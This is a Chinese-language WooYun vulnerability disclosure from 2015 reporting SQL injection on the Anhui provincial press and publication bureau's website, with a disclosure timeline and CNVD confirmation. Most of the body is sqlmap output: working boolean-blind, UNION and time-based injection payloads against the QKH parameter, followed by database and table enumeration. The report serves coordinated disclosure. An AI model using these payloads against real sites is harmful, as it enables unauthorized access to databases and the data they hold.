当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151118

漏洞标题:安徽省新闻出版局主站POST注射

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-11-02 18:02

修复时间:2015-12-21 11:04

公开时间:2015-12-21 11:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-02: 细节已通知厂商并且等待厂商处理中
2015-11-06: 厂商已经确认,细节仅向厂商公开
2015-11-16: 细节向核心白帽子及相关领域专家公开
2015-11-26: 细节向普通白帽子公开
2015-12-06: 细节向实习白帽子公开
2015-12-21: 细节向公众公开

简要描述:

get注射还有好多。。
基本上的参数都有

详细说明:

http://**.**.**.**/dzqk/ QKH=182
QKG存在post注射

1.png


get注射不列举了
百分之99的参数都存在注入

back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] webuser
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: QKH (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: QKH=182 AND 3450=3450
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: QKH=182 UNION ALL SELECT CONCAT(0x716b716a71,0x426e726a5974446f4148,0x717a717671)#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: QKH=182 AND SLEEP(5)
---
web application technology: PHP 5.2.8, Apache 2.0.59
back-end DBMS: MySQL 5.0.11
Database: webuser
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| web_infomation | 13206 |
| web_inter | 7573 |
| web_online | 4733 |
| web_infovote | 3561 |
| web_bmxx | 2883 |
| web_coll_guest | 2735 |
| web_bbs | 2576 |
| members_infomation | 2086 |
| web_topic_info | 1857 |
| web_ldxx | 840 |
| web_source | 568 |
| web_log | 387 |
| web_vote_log | 345 |
| web_infomation_ty | 313 |
| web_vod | 253 |
| web_author | 219 |
| web_topicinfophoto | 188 |
| web_members_type | 163 |
| web_wm | 150 |
| web_topicinfo | 141 |
| web_ads | 131 |
| web_menu | 112 |
| web_link | 98 |
| web_topic_ty | 95 |
| web_vote_item | 72 |
| members_infomation_ty | 40 |
| web_topicinfo_ty | 40 |
| web_coll | 35 |
| web_vote_txt | 34 |
| web_ads_ty | 32 |
| web_topicinter | 31 |
| web_topic | 27 |
| web_link_ty | 16 |
| web_vod_ty | 15 |
| web_wm_ty | 11 |
| web_live_link | 10 |
| web_xmt_ty | 10 |
| web_infomation_comment | 9 |
| web_live_memoir | 8 |
| web_user | 6 |
| web_user_priv | 6 |
| web_xmt | 6 |
| web_live_pic | 5 |
| web_vote | 5 |
| web_live | 3 |
| web_topicinfophoto_ty | 3 |
| web_coll_ty | 2 |
| web_inter_ty | 2 |
| web_bbs_ty | 1 |
| web_bmxx_counter | 1 |
| web_bmxx_ty | 1 |
| web_branch | 1 |
| web_ldxx_ty | 1 |
| web_title | 1 |
| web_vote_ty | 1 |
+------------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: QKH (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: QKH=182 AND 3450=3450
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: QKH=182 UNION ALL SELECT CONCAT(0x716b716a71,0x426e726a5974446f4148,0x717a717671)#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: QKH=182 AND SLEEP(5)
---
web application technology: PHP 5.2.8, Apache 2.0.59
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] webuser


漏洞证明:

ts

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-06 11:02

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无